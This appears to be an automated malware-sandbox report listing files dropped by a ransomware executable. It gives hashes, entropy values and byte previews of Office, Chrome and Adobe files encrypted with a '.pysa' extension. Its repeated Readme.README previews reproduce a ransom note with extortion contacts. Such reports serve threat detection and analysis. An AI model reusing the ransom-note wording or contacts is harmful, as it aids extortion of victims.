                  SSDEEP:1536:MXXJmRSHV8hn9kUvxXLUFNxThZAgc1lECBlaLQiVnJ8r19D3sXNnXIMY:MX5mY1gD56wgc7deRO9D3sXhXIv
                  MD5:5099E00DF7E65169E1150CCB14E90AAF
                  SHA1:A64A2EDAA0D4B343F209FEAB0AB08838F4120FFD
                  SHA-256:270CBC7091B9B13D1FE43E0C0DC752817D08A6658E90702C24C72EAAAAE3910A
                  SHA-512:538C814B40B21DC0F6F39BA26E164542F957B69CB8C250EEB2D382A788F7AC3BA8F67D6327F05BEE014B4D032E4C38E81C607FF62953AB0D37C6F7BC262EFA98
                  Malicious:true
                  Preview: X.W!......o.F.......Q....Y..m..*.>`<@...A.N..HQ...VG....k.T?.Uu...."..|rZ...q.~...jw.8.U...,."n.>.x'...2....B.L..Z.........r.r..n...Iw...jkJ.z...u~.|..A..Ze...?.>tte.!..H......qXHr....b..(.sMm..K..4.L.....s..gk......&..]K.....c2.\.2.u.8...B(.z.0.......pXW.=.~..4.t...98........]..c...."....O/'.7.......O.6..k ).l..U.@.x....T^...-...<.L.].....k~..0.#.p.Fn3..?.3..C.a.3G..8n...,...?v>.r*.8)>.H.\.p.&..#...=.?"].._.1x...b;E$+...xA....>..+g.T.^..:.$)B.>}+.].3o.C..ol.."{.w.=G.r..H...N..H.A...L|.<...C.fm...._8..f.....[B..L.;.Bs..Bu.pHTi.6.J.%../..9....i....7..s....^...s..<q...U!...G..D....fW.....y....IiJ.F.%..a.......{.....r8=..z...*........ .L...NZn...^.XL..Z.Y..d.a.bc..G.C....\f....B.e.c.-.1..............>...dR..U8c.@m.&.....4.Zp}y0r..0.4h.7p.~;B_N..B..2...N......0U....8|,.g.pA..C.!.<...[..yC.:o..f.yL..~...Oso.d...[.ax.4....s.3n.l?...8.:1X.G.V.BF...Km/.8.>r.>.H...t..!yv....x`.;.D..]...6J(.&h..6...M...m|.v...f@B?.5.a..v.c.....&.>gisE`..<..i.O
                  C:\Program Files (x86)\Microsoft Office\Office16\System.Windows.Controls.Theming.Toolkit.zip.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):13312
                  Entropy (8bit):7.817411287727557
                  Encrypted:false
                  SSDEEP:192:hx9aZQnB9BFiyGsdDuItk03HH7lz7fUKZECdjh/+wilixl1DHlpoa+wyvDQ8sEZ4:heYWs1k0X7VrZzhaYlJn4vMxDGW
                  MD5:D9ABBCA5D5D66BFBEC2EC9B1F332CFB7
                  SHA1:03EC05567EF09BD26ECC1ACA86F68A46ACF245EB
                  SHA-256:6E0214C6BC6D46834B159B7BD6EFE9D7F1EC7B901F6BF0AA04F23EF7060B1889
                  SHA-512:490CF91BC2121A0EF27C6DEB45425C2C3D468647EE3E7DFD4CBC2154E155BEB51545FD62C291A0504A9A7D6C4BEB210E16C660B9146F6C7C3B7D653C5DB5D8AB
                  Malicious:false
                  Preview: =<...@..........,u....G.I....J......u.!.@...Ah... .+.......D#?d....|..l....m..o/.^.}....ZU...Rw!;..S.,i$^..c7Xvf5.......<...Ap.?..`.e.XB%...rk .N.*\v>..H..u= ..b..".%..9.I..8(.`.v'....k}.rGe4j.w*7{.S.....X.....x.E-D....I......P.._..%.'..~..].B.#.....gr.J....bK3.........`.2w...G...s>.S.eI.E:"}.....}R-.b.!.:.i.0.../..LdyE...Hj..DS3..pE..<...."dG..6.!..]<f..[....n..$EnI..v.C.W\.Y1...pD.g.S.+I...?z.I.....@.NU..?.~xlC..aC..E..f..^....b.QO.k......H......[6.ER.i5...(4.c.!.?.k[_n..$.1.....%.99..N<.N~$.2.t....J.........($E(.}&....\.q...O..1.)C+>.'....Nb.....].....%..hF.6~....]...!ZY._.G/S..L....>...#N.Y.._.......N..$KF0.......H..L..B@../|.!.%.X....2.i.B....0J.......!...(B.X1.k..L....u.Eq.bz.s..F.&7.X..w..9....@(.jI5..v.W.....N.x...vu0...3.!.W.T....I.83..U....$...nk..;...d...4.in.". A3.....*._.n..A..!'-.......$./....KXv...fP.)..:.B.Z...Q.l.aH.u.Ex.d.u.....C.....o6..0........}b8;...{..yF....2-"O..Rq...C...Ej...+.gC........o.jJ.....,.Bvgv.......~
                  C:\Program Files\Google\Chrome\Application\85.0.4183.121\Installer\chrome.7z.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):22519808
                  Entropy (8bit):7.999991216410175
                  Encrypted:true
                  SSDEEP:393216:VvcWLvM7LjkAtoyoaaqc4fb6djbsDL9Fl99f2X8g6HtvMPeAlXKkti+30BgGlD2f:VvcWLvM7vkAtoyoanceb6df+RH72MgOK
                  MD5:FE80A0BE2AF51D40342DA75C44BB05E4
                  SHA1:6CE19764BD30E70BE852B816BB90A9E86F063BA9
                  SHA-256:3B929EC06C397C2CB60DBD2032AA90B86F2867B6259075ABBD205BF41107E009
                  SHA-512:22253AAD61E2C744AC470BC758C12D7E1A0D61225A002F38A9AF100A82412AC1B00DCC319DD914B5B1C07B5290E41952867850A15F7DFE6A5DFC3CCA4AD92E02
                  Malicious:true
                  Preview: .f....$|k..FVx........a....4.;y.(Y....?V'..*&.....S@.3.._....M.3T......p..).......S.u............B.._.?.9e,...|I,.u..O....w.7.k...9.85P..>$DI..|..*..............%_.&O....I..P....6.;89....%.l).....vc.......=..d..RX..G......;.....b....E..?c......._a.c.1....<-.0..f\_.q..q.G..~h..t<.F ....4.%..8..hP.p%+R..e.zcE.X*W.w.4|t..A;.co..G<..j..`.2...d..aJosZT.{..2Z{.+.....f0Xj...l......g...5.P.i.d..,f..ZE....P.....-.q0..+.Y})P.SLca...@..I....@....C.......H.K....D...PbqJd..bZR.g...bw.O...&..S8..._.I.s....uw..J....#......[..0%>g]]s.......[..)o.....$.._.w.........\.l.._6{....f..]....cK.I;...~.uz..W.I..hk..D.\..8...z.1..9."...4xR#2X?.Q09{.E...2.K..iE.."E.Li.........}.....K(eF. r0"=.........=;...j..6.r,.S.....D.#.m.(c.<.....:..B...S..l(....Xd*F]E......z..|........4L...h.....z..}..T..|.|x:.B..M.K...Gk.h.c..C..B9.*1=.).T.YC.....z.DS-....Xv...e..5n.Xk[....tQ....b.%....&.0t_l9.)...F.s...&.].Q)...7.Pl..!..g.*..p.....L...u...Hva....-...*...m....Y^.
                  C:\ProgramData\Adobe\ARM\Reader_19.012.20034\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5863
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbi:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bi
                  MD5:7D2D0230A6D2F068D349F2A3DC2154DA
                  SHA1:08754C94E77D1D995CE1416B1BBD01AA64A34651
                  SHA-256:F03E8315D380F0A2E34B2221D627CC7288406492494420A86CED75999338921A
                  SHA-512:D1B1123E7C6CB6C89C2B7411DE439FB03B13D341A7091BDF913CD08FB8BFDBFCEFE9A4AC7A345A3E558001F938B85861317194AF8358FB7D935F7EAB7F3C433E
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\ARM\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.9997451425907204
                  Encrypted:true
                  SSDEEP:24576:jV7Bg97KUfgIBbjVyoKSZm7UBlmHbh9INtm0Prl5IAmk:ha9FfgIBjVBc4BlojINtzrl5IAmk
                  MD5:F9529264DBC60B06FD0CFB0D822DBEC5
                  SHA1:8C7AD4A206A70034CB23C72FCF1252C6215DCBFD
                  SHA-256:2B2077944C2EDEBF48C7998F406CC32C5007073C1CBA343E53F8F9007C0FA44F
                  SHA-512:FE884D083A9058B338FA86209074AC4FCA39FA39C4EF4B9D381D544498640D3E2E25B87FA247048AEB0325F71B3E00A23F709A4D3D609B2D6607DC01E6B8010E
                  Malicious:true
                  Preview: pZ....%...6.-.....?..pP..W.@wp.Q:...R.s...........K.>..U..G.r*..j.a...H"_..Y..7[.._.M..,Kq<7....q/h...0.i..:..$..n....a\.M1.......R.Y5.......7p..E...qO.Q>....:q,.-|..&{...46_.....jfy0N..)0.]...y*.M *.].2.^m5..x.V..(B...R....C.{|..^..5.zc.Gu..R\....E.e..5F......<....z.O...C3.....Z@.E.K..{'..t5.3?.0....-`....UGU.@.i3.m..i...~....E...f......d..y....C..Y2....`...=.(..C*.f."<........)b...].;paJ.......G...9{..?>v0~./....^...|.s4......D..O|.:..LFSK[.I....E;k.c:#...s'...4...].........8. .^#Rj.:L.+.H...@....V.....*?3.}sF.=.W7(.K..F.....qi......Y.rN.Bg{c.....T6.{..0j.B.&m..v\.w>.J.S....%..?.o..|......9'|...d*...(Q=v.g.m.aDQM./.c..........r..R.#i.......2.r]Y.N.Y,.c(~.IN....O..O..:.p3._"..513...S$...o.qC.4Uy...../QC...6.).o.1..4...Y.S[.;..).E"..y.3T^P..tc....Vj....9.0..z(.../8h.*..*.....h`-PP.GX....'Mi=.._.`.Z.l..z.....W.4....X].......&..g.fp.+..>.%8o#z_..L.|9.c.....(zW%.$.53.(....a...^...CO..q.l..aS1:..h.0...y...u......R......I.)go...b.....c.....
                  C:\ProgramData\Adobe\ARM\S\436\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\ARM\S\ARM.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):923648
                  Entropy (8bit):7.999728877983258
                  Encrypted:true
                  SSDEEP:24576:+aWtfnMWUQv3VpcSUMojoDZHVDHLm9LHX6H36:ZW9MM3MFul1DHLsK36
                  MD5:6AC0F40904604747557376A051B5183A
                  SHA1:487F398EE4A4A270805D045BFF2DD7176D93AAE7
                  SHA-256:35C16D744F2DD5E9F0DA49A40B09CB25121E11BB18D8B69FA790EE873D459D74
                  SHA-512:71D625733DD8956C017BE3C047ACA14F3D46D363DB19E8378DFD8D46213BD44ADEBFC177C6B333BAB88E7B85E15B87C40C444F7D2D06E3B7DCC66D2F4B2731C8
                  Malicious:true
                  Preview: <.!..7........=..+.kz../...4'..G...h"..k"u].4.eI=.....`.d...{..@3....1.z..j..4.....|<9t..3....:...Ei......(...^...q..x..(s.72.w\3H..P...x-.bod&........J."j.41.ZF.th9..L.K....[].-..|.w. w?9.6..E.....`6.e.h..x...P)....~c...i(_a.]D.%X=.3.7.|...?..H|..+o..'...o.9A.[...vh..P..<.F.4.<o.....`..'..;.->.}?.....m.!.Z..2.M5....-*.A<........[...C.0.@.FOD3.(.t.C..E;..(@T..7.tN.i"...W...Fu.d.<..9s.......V.. GC.-h....k...(&@..A=4md;............m..mk6 .=...T..X.......|.n.Aa{..{...P..J...1..N.u..:$T..j'..8...33.X....d.....Q....<...UP.H$.!O.....o;.c.z..x.y}.DnJ..<.H9b.....IG........0..Q.. ...x...x..\.m...G?...L....d.7e).....g....qV.Sz....c.S...?.Nx.>j.....]4....}.k..LR..*..a.....Gc$......./......=.....LZ!!...3.o.....R.p....8..K.u.....y.....aP.].7...'..6F.x.....1....#.m7H..e.U,...3C......;........Q...........4.7f..x.B)z..U.s3CV.y.e.H.u.....I.q=.n..m.....a.*G.+NO<.7.1....0.Q.f.[.:B-B...g.X......~A.d....;..........)\..K..Kr.*..P..o.Y...qM.C.e*...O.\AF.EC.B...
                  C:\ProgramData\Adobe\ARM\S\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\RdrManifest3.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16384
                  Entropy (8bit):7.8690380725252105
                  Encrypted:false
                  SSDEEP:384:jyx/T85eF3cw3I8/7ZajSBdLDWTay85LCz0IolBpKhz/+0EJmb:jyt4ocw3bz7LLt5LCwIoYhz/+0EJM
                  MD5:C2F74B07B4CC4141928C37E0D94F01CE
                  SHA1:F37A72B0C97080CDF59CEA5610A43B2D4633DBF1
                  SHA-256:66FF169E1D2D82EBFECDAE78FBF737941B246D32B518B290873A9B0A2BFE3115
                  SHA-512:019069B6D6B1CBE15CEB402C45A20C5D53A22D8071D07B05F85B86E11B630582B8737B47A4999D8E0DDC816B7B5241460344C1D422F23C7A2A5DCADDE90396B0
                  Malicious:false
                  Preview: ..k.;x...e$.....!.)......M....0..p.A,.|h.'...5.@K..U...n.x.fq/.u.u..d.......C.7.........xC.Y....Vb.]..o\...d...e.......7.`C.......4..Ad...w].W.G(%..A.$.2!.n1.{.......Qq.....\&..L...w..uq...X[..-~..v...HW..z1..F......[...+...V....t/...h%..BQ|7W....*2E.....Z..C..i.E=..z...@n.[l.S..(j.+.k..c.N...`IQ:..Z..p .\.......>.,..bc.t..P.nt....`+..k...S...).`m...5F.cn.+t..... .......~P.D.E.Y.@/u..#J..8....'..L-..h%.6. ..\.*}iO8}.#..=>.]X..h9...;<k..<...^.<.8....."....'...[...$..BF.[]...ULW.+...0.K.....H.).x.b=.eFY......@..Hd}.n.....X.eK....&...H;j..?ITBEy...L.!.v..7O.eS..k..,R.\..,..V>...)...K%.I......V.^9........E....-....(b..........G.6..R:........s..R..P.X.....m..T..33.Z=0,..o^.k.c..H0..#Uxo.NY.r.Tn.y^.J...H.....>..m.~..N....N................F.[.f..sS..4T..;|......"b.Dk.X..5+.#....X...S.Q.......u.fE./..|.O.....Clv.....1he.....[...c(U.FI..4...?..U.....3m......iG S..k.^..z.A..U..#6V..mD/...>.=l.:.n..C.x#j.9..G..{n9..e....a7T..z`rZ..A..h....$.....V^F9!J..'
                  C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):5330
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:96:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbLgNDPOmb/:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1b/
                  MD5:86829E285FFE753B46764498EB17BAD5
                  SHA1:5A2AD87C28C9DCE2BA754E741D4BE79762A8F3F5
                  SHA-256:97158737768A6DDD6F469376A7B1AD422F7E372942CB4870936C31125C3EFBF0
                  SHA-512:6B3E70D24EF4871B6C07439547D578AA5B6D964B8CEE1B41F9E1C5636EEEAE4993DABCCE617673C9BD7DD30EB50F6DABE39E19113797B6E7CC1EC4E7EE26FE5C
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6929
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:C0A9D03A4B3295C87645F029304DD87A
                  SHA1:6D8C6048A086BE6AA2AC9EB4BC43DE151A558915
                  SHA-256:356018D7702D459465C1052494D62047F2BBA391EE1C9BC8C989715687FB59AF
                  SHA-512:79C334E2AFDC8C976310B4E8D891A61EAFB16E225BF7E3EA65742F88490AE870003F1B7F37565D874B8ED0FBE14FF005C81AFD893C073F9C4E56D2325D0F9102
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\Setup\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):6396
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:192:e1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLg1bLF:epEpEpEpEpEpEpEpEpEpEpEpJ
                  MD5:B030E8AF6A78DA26D1104F4C1D7D1A66
                  SHA1:DBBBA62B4A2A169EB4C3A915F801DBBE61EE559B
                  SHA-256:226A7F2A2F40CE3F60B690E05DBD52699EB6CDC906986A901042C2FCCB108215
                  SHA-512:85591996BF1098624DDBFBA830D57B6943063567B7CBF094792AF37110194CA49A564B613AEF3B097CF29B91E9B47C0AFFD58CABC62EF664AC0B869B118B312F
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRdrDCUpd1901220034.msp.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):24434688
                  Entropy (8bit):7.999991974155476
                  Encrypted:true
                  SSDEEP:393216:Q1cLDkv0RTSUyAYo9MkIekVTh1hfm7B5i5ORoRja9akZHZJaSBOCBce:Q1cu0tTy0eek99m7ri4RoNa9akRaSICr
                  MD5:B385671C91E36F736BFA6726E60FDFFB
                  SHA1:74E4BC81D66A8A5B17698272D9B6A5883D1A034A
                  SHA-256:D3C39DFC31300CA0F2780C1A5CA336A492C809FC500526902531D7C85FCE7109
                  SHA-512:C39CE8BC57842C0F54919E07D2010ECE35A4B92B34E11F264D687F3D0E4CEEB2EB66B9AF8C597CBF78F7A858191CDAA99B940C90BADEE99800D0E1447F992E51
                  Malicious:true
                  Preview: .U%.5.3Z...L..f.........b..."....r.>.(nI......v"rr.q.Z..-.+9r*......W...R.Q.A..z.J..].L.B..Q|..u...x....Y.N....7.0..<o.T.k]%Lkwq_8.....6....PViL...N=....57..]..g..[..V..#W...-.ul.V.....v.W5...p...Ru|.w.x.......|Dc.K)....L...PX...,....$........>...z.Y.i..e.....f55.../).A&.;.!..J...r4......w.....89..U^...r..BuR....+6...e.....,.E..\5.$...~.y$:..3....T.......s..)F...i...v.....}....Y.}.x.{.8.L!..l..x.?...%_.U..<L.D2..:.E.s.I,.)....<..df...%..hLK=...'.....}.Q0e.5.?.+Q..WB.........W.Q.g.8VWr......ZV...9...a....F@.n,."..E.x..k...@..u]s....z8'.Z...<..9.-E.Q....,.r8...Y.p..M>......'.L...P(>...-O...qF.j.C.i.#:.....hapj.]....A.......8...h4.(UR.^peE.dZ..\4O.......@.D.WA.}E.30.w.I~..%[.P...d..O. ...N.Y.k...:&.js.d....c...C0..r...V......_P.Y.dH.{V.W..l......cG.{....|.....g.2.:FG....P:t).A...O..pHV.i......{Q..s....bs...P..\.i....E..r...b.{.YA..,..Ct.k..%P.:../.../.Z.u.x(...+.B...G..E./..Y.aY....#.....w.g....D..?..F;L\n...)..L"....v.,.'.......;.....Qs]...d!
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2766848
                  Entropy (8bit):7.9999331616858
                  Encrypted:true
                  SSDEEP:49152:rV0N3Dj++VKD/ZdKFnnkHXKGptNjaIg65lXlUKOcx4PuSkGMJ8LwYYQyeJbV9rB/:rO2quZdeeKGn2BgvqPuSk5ScYxyen9rd
                  MD5:8B566DCBE8495E7E4959472AB967E2FA
                  SHA1:176513AC0997C50CBB483DC092DB69327E17E30D
                  SHA-256:58180CAB3CDB64958ED927849E57C02035ED3AE8147856439785A215ED375AF1
                  SHA-512:B7970D23C2A217B8E91A9D76AD5C80B596A77FDBD5A0771112DA0C72B4FD8C96B3B7239773A9905FB910720416E8F5D5C172D965107594ADF9975EE65F039819
                  Malicious:true
                  Preview: ..c...o..I.....n...8?`.bV...i.,..~.2..]$f|P.b..[..{...Y..K..4...8.......v...T].....v.4;D... z..D.?.....^.<.v~..{..F.&..I...!.j_.....=I~..PU@..:..G....j.nS.B`_)..n.yS..G .U..w....0f!...D....2......@.w4V)R.r*X.?n>:'..Q)..`{.`..e]oJ+!....U......=^R./\..M.~F.$.-T......,~...Z.,)E.A+.N....8......W......j.).&..QF.:%v|@.d.R.N.RKn....5.......K.*...........AT...Y...Pkb..=.V=U.....#..l....~..p%.HZk.O.V6?...H.[.'....{.]{X.......3.1...r.5s..'dEs..3>s,..\..5m...A...gy...@.|T.+....v.......e..u....s.X@v.dW(..$G.0..i.b"...@..M.. ....+.\.z.....E}7....G..1..%|....O[.......v.......(s....O#)...Q....T...-#z...q0J.b.R.v...?...-.Pj...!Pl5.u......U........>xo%.".K...a|Z......c....Jsc...G......(Y7..wd.C.....HZB.%R..ygy....Z#.%:.U.n.....[;N.;$.....{J.wM....b..h.f....T.........B.a].z....[....D....a.:..8...y.7.......f..1L..aP.].LTd.j..2.6O8.SbB-....`.{*B..D.sF...F..%..^....b..1..t.;.q...n...ikQ=a'..(....etZ..`.p...tGK..e?...R.f..F...._o../..G.QV.._..yA-..Vv.N4.j...
                  C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):17512448
                  Entropy (8bit):7.999986673125578
                  Encrypted:true
                  SSDEEP:393216:q+ZrWTIk77KHS9lo73KwZYC2dt80idHjU6KUMZE6jdmzo+:q+pw7uHS3sKSYC+t80KlSLjIzb
                  MD5:C6FD57DE5E74C72A751E5B5843281560
                  SHA1:1BE29C8B8BD51EF0D67805492C873B6E8A42E4EB
                  SHA-256:7F9D92FFABC741352302BDDEE0B4730E8F62FEF70897406762AAB036F48CF30F
                  SHA-512:8D875F3BD94ECB535E6195F90E6D350D95F6E181537A0758F16E606A9ABCE601076C192E9DBF229B02430525ED5E62AD4EB1A4015698F416F7132D84F438DC08
                  Malicious:true
